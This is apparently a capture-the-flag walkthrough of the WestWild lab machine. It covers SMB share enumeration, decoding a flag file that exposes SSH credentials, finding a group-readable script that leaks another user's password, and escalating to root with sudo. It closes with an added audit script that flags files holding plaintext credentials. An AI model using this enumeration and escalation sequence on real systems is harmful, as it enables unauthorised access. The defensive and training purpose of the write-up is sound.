
WestWild

usershell

Target IP: 192.168.205.148

Service scan:

22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

smbclient -L 192.168.205.148 enumerates the SMB shares

print$          Disk      Printer Drivers
wave            Disk      WaveDoor
IPC$            IPC       IPC Service (WestWild server (Samba, Ubuntu))

smbclient //192.168.205.148/wave connects to the SMB service

Two txt files are found

FLAG1.txt                           N       93  Mon Jul 29 22:31:05 2019
message_from_aveng.txt              N      115  Tue Jul 30 01:21:48 2019

base64 -d FLAG1.txt

Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open

Connect over SSH to obtain user-level access

rootshell

find / -perm -ug=rw -type f 2>/dev/null

Searching for files that both owner and group can read and write turns up /usr/share/av/westsidesecret/ififoregt.sh

#!/bin/bash
figlet "if i foregt so this my way"
echo "user:aveng"
echo "password:kaizen+80"

This gives the credentials for the aveng user

Switch to the aveng user

sudo -l

(ALL : ALL) ALL

sudo su
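
The escalation above depends on a group-accessible script that stores another account's password in plain text. The following audit sketch is an added example, not part of the original write-up: it lists files under a directory that group or other can read or write and that contain a password-style assignment. The function names, the pattern and the demo files are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added audit example (not from the original write-up).
# Lists regular files that group or other can read or write AND that
# contain a password-style assignment such as "password:..." or "pwd=...".

# Pattern is an assumption; extend it for your own naming conventions.
CRED_RE='(password|passwd|pwd)[[:space:]]*[:=][[:space:]]*[^[:space:]"]'

audit_plaintext_creds() {
    root=$1
    # -size -2048: skip files of 1 MiB or more (512-byte blocks).
    # -perm -040/-020/-004/-002: a group/other read or write bit is set.
    find "$root" -xdev -type f -size -2048 \
        \( -perm -040 -o -perm -020 -o -perm -004 -o -perm -002 \) \
        -exec grep -Eil "$CRED_RE" {} + 2>/dev/null |
    while IFS= read -r f; do
        # Print "mode owner path" so each finding can be triaged.
        meta=$(ls -ld -- "$f" | awk '{print $1, $3}')
        printf '%s %s\n' "$meta" "$f"
    done
}

# Constructed sample tree: one exposed script, one locked-down copy,
# one harmless file. The credential value is a placeholder.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/bash\necho "user:demo"\necho "password:EXAMPLE-ONLY"\n' > "$d/exposed.sh"
    cp "$d/exposed.sh" "$d/locked.sh"
    printf 'echo hello\n' > "$d/harmless.sh"
    chmod 664 "$d/exposed.sh"
    chmod 600 "$d/locked.sh"
    chmod 644 "$d/harmless.sh"
    printf '%s\n' "$d"
}

# Run with --demo to audit the constructed tree.
if [ "${1:-}" = "--demo" ]; then
    tree=$(make_demo_tree)
    audit_plaintext_creds "$tree"
    rm -rf "$tree"
fi
```

Files reported by the audit should have the secret removed and the password rotated; tightening the mode to 600 alone leaves the credential on disk.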